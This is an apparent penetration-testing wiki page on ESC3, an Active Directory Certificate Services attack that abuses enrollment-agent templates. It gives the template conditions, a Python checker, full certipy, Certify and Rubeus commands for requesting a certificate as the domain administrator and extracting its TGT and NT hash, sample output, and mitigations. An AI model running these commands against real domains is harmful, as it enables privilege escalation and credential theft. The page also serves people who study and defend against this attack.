# ESC3

## Description <a href="#description" id="description"></a>

ESC3 abuses certificate templates whose EKUs include "Certificate Request Agent" (the Enrollment Agent EKU). This EKU allows a principal to request a certificate on behalf of another user.

### Requirements for attack path (1st condition) <a href="#requirements-for-attack-path" id="requirements-for-attack-path"></a>

* Enrollment rights granted to a user or group we control
* Manager approval not enabled
* Authorized signatures not required
* The template's EKU includes either "Certificate Request Agent" or "Any Purpose"

### Requirements for attack path (2nd condition) <a href="#requirements-for-attack-path" id="requirements-for-attack-path"></a>

Provided the conditions above are met by a template with the "Certificate Request Agent" EKU, a second template must also meet the following conditions.

* Enrollment rights granted to a user or group we control
* Manager approval not enabled
* The template defines an EKU that permits authentication, for example "Client Authentication"
* The template schema version is 1, or it is greater than 2 and specifies an Application Policy Issuance Requirement that requires the Certificate Request Agent EKU
* No Enrollment Agent restrictions are configured at the CA level

{% hint style="success" %}
A likely candidate for the 2nd condition template is the default "User" template.
{% endhint %}
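The two condition sets above expressed as a checker. This is an added example, not code from this page, Certipy or Certify; it evaluates a subset of template attributes (AD schema names) plus a CA-level Enrollment Agent restriction flag, and the sample templates are constructed.

```python
from dataclasses import dataclass

# Well-known EKU OIDs
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_ANY_PURPOSE}  # EKUs usable for authentication
CT_FLAG_PEND_ALL_REQUESTS = 0x2                 # msPKI-Enrollment-Flag bit: manager approval


@dataclass
class Template:
    """Subset of an AD CS template's attributes (attribute names follow the AD schema)."""
    name: str
    low_priv_can_enroll: bool   # enrollment right held by a principal we control (from the ACL)
    enrollment_flag: int = 0    # msPKI-Enrollment-Flag
    ra_signature: int = 0       # msPKI-RA-Signature: authorized signatures required
    schema_version: int = 1     # msPKI-Template-Schema-Version
    ekus: frozenset = frozenset()             # pKIExtendedKeyUsage
    ra_app_policies: frozenset = frozenset()  # msPKI-RA-Application-Policies


def needs_manager_approval(t: Template) -> bool:
    return bool(t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS)


def meets_condition_1(t: Template) -> bool:
    """Template hands a low-privileged principal an enrollment-agent certificate."""
    return (t.low_priv_can_enroll and not needs_manager_approval(t) and t.ra_signature == 0
            and bool(t.ekus & {EKU_CERT_REQUEST_AGENT, EKU_ANY_PURPOSE}))


def meets_condition_2(t: Template) -> bool:
    """Template accepts an on-behalf-of request and issues an authentication-capable certificate."""
    if not (t.low_priv_can_enroll and not needs_manager_approval(t) and t.ekus & AUTH_EKUS):
        return False
    # Issuance requirement as listed above: schema v1, or >2 with an RA application
    # policy that demands the Certificate Request Agent EKU.
    return t.schema_version == 1 or (
        t.schema_version > 2 and EKU_CERT_REQUEST_AGENT in t.ra_app_policies)


def find_esc3_pairs(templates, ca_restricts_agents: bool) -> list:
    """Return (agent_template, target_template) name pairs that complete the ESC3 path."""
    if ca_restricts_agents:  # CA-level Enrollment Agent restrictions block the path
        return []
    agents = [t for t in templates if meets_condition_1(t)]
    targets = [t for t in templates if meets_condition_2(t)]
    return [(a.name, b.name) for a in agents for b in targets if a.name != b.name]


# Constructed sample templates (not taken from any real environment)
SAMPLE = [
    Template("ESC3", True, ekus=frozenset({EKU_CERT_REQUEST_AGENT})),
    Template("User", True, ekus=frozenset({EKU_CLIENT_AUTH})),
    Template("Approved", True, enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS, ekus=frozenset({EKU_CLIENT_AUTH})),
    Template("AgentOnly", True, schema_version=3, ra_signature=1, ekus=frozenset({EKU_CLIENT_AUTH}),
             ra_app_policies=frozenset({EKU_CERT_REQUEST_AGENT})),
]
```

Running `find_esc3_pairs(SAMPLE, ca_restricts_agents=False)` pairs the agent template with every target template that satisfies the second condition set; the same call with `ca_restricts_agents=True` returns nothing, which is the effect of the last mitigation listed at the bottom of the page.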

## Linux - Enumeration

{% code overflow="wrap" %}

```bash
certipy find -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -enabled -stdout -vulnerable
```

{% endcode %}


## Linux - Performing the attack

Perform the initial request against the identified certificate template configured with the EKU "Certificate Request Agent".

{% code overflow="wrap" %}

```bash
certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'ESC3' -out cert
```

{% endcode %}

```
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.10.2[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.10.2[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Moe@SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-1105'
[*] Saved certificate and private key to 'cert.pfx'
```

We can request a certificate on behalf of any user using any other template by including the initial certificate as proof. For authentication purposes, it is essential to request a certificate from a template that includes **Client Authentication** in its Extended Key Usage (EKU) settings.

{% hint style="warning" %}
For accuracy and to avoid certificate mismatch issues we should always aim to provide the -sid parameter, set to the SID of the account whose UPN we are targeting (administrator@security.local in the example below).
{% endhint %}

{% code overflow="wrap" %}

```bash
certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'user' -on-behalf-of 'security\administrator' -sid S-1-5-21-13999771-2333344039-1820745628-500 -pfx cert.pfx
```

{% endcode %}

```
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 18
[*] Got certificate with UPN 'administrator@SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-500'
[*] Saved certificate and private key to 'administrator.pfx'
```

Finally, authenticate with the certificate to obtain a TGT and the user's NT hash.

{% code overflow="wrap" %}

```bash
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'security.local' -dc-ip 10.10.10.100
```

{% endcode %}

{% code fullWidth="false" %}

```
[*] Using principal: administrator@security.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@security.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bc
```

{% endcode %}

## Windows - Enumeration

```powershell
.\Certify.exe find /vulnerable
```


Identify enabled templates that can be used for client authentication.

```powershell
.\Certify.exe find /enabled /clientauth
```


## Windows - Performing the attack

Request a certificate for the template vulnerable to ESC3.

{% code overflow="wrap" %}

```powershell
.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:ESC3-P1
```

{% endcode %}

Take the private key and certificate from the output and place them into separate files.

{% code title="cert.key" %}

```
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----
```

{% endcode %}

{% code title="cert.pem" %}

```
-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----
```

{% endcode %}

Then merge them together with certutil to create a .pfx file.

```powershell
certutil -MergePFX .\cert.pem .\cert.pfx
```

We can request a certificate on behalf of any user using any other template by including the initial certificate as proof. For authentication purposes, it is essential to request a certificate from a template that includes **Client Authentication** in its Extended Key Usage (EKU) settings.

{% hint style="warning" %}
For accuracy and to avoid certificate mismatch issues we should always aim to provide the /sid parameter, set to the SID of the account whose UPN we are targeting (administrator@security.local in the example below).
{% endhint %}

{% code overflow="wrap" %}

```powershell
.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:User /onbehalfof:security\Administrator /sid:S-1-5-21-13999771-2333344039-1820745628-500 /enrollcert:cert.pfx
```

{% endcode %}

Again, take the new key and certificate from the output and place them into separate files.

{% code title="admin.key" %}

```
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----
```

{% endcode %}

{% code title="admin.pem" %}

```
-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----
```

{% endcode %}

Then merge them together with certutil to create a .pfx file.

```powershell
certutil -MergePFX .\admin.pem .\admin.pfx
```

{% code overflow="wrap" %}

```powershell
# Get NTLM Hash
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /getcredentials

# Get TGT
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /nowrap
```

{% endcode %}

```
< -- Snip -->

  ServiceName              :  krbtgt/security
  ServiceRealm             :  SECURITY.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  SECURITY.LOCAL
  StartTime                :  04/03/2025 19:25:09
  EndTime                  :  05/03/2025 05:25:09
  RenewTill                :  11/03/2025 19:25:09
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  30AP07EilJ/mM6LsDioVPw==
  ASREP (key)              :  C2E0C2C00D58B05671F7DA68F4D72796

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 2B576ACBE6BCFDA7294D6BD18041B8FE
```

## Mitigations

* Require manager approval on the template
* Require authorized signatures
* Remove weak enrollment permissions from the template
* Replace "Any Purpose" (if configured) with a more restrictive EKU
* Use Enrollment Agent restrictions at the Certificate Authority level. For example, restrict which users are allowed to act as an Enrollment Agent and which templates they can request on behalf of others.
